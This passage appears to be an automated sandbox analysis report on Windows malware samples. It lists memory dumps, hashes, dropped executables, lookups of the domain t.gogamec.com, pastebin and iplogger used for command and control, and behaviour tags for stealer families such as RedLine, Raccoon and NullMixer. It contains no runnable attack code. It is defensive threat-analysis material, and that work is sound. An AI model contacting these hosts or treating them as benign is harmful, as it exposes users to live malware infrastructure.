memory/2896-208-0x00000000038F0000-0x0000000003976000-memory.dmp

memory/2896-206-0x00000000038F0000-0x0000000003976000-memory.dmp

memory/2896-210-0x00000000000A0000-0x00000000000A4000-memory.dmp

memory/2896-209-0x0000000000090000-0x0000000000091000-memory.dmp

memory/1816-217-0x0000000002D90000-0x0000000002E22000-memory.dmp

memory/1816-218-0x0000000002E30000-0x0000000003B71000-memory.dmp

memory/1816-219-0x0000000003B80000-0x0000000003C0B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f7871e5.exe

MD5 a014b8961283f1e07d7f31ecdd7db62f
SHA1 70714b6dc8abbaa5d1cba38c047ea3a4ec6ac065
SHA256 21ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89
SHA512 bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869

memory/2524-276-0x0000000000340000-0x0000000000348000-memory.dmp

memory/1572-293-0x0000000000D90000-0x0000000000D98000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe

"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe"

C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe

"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe" -u

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 27.178.89.13.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cd42a7c874e44.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
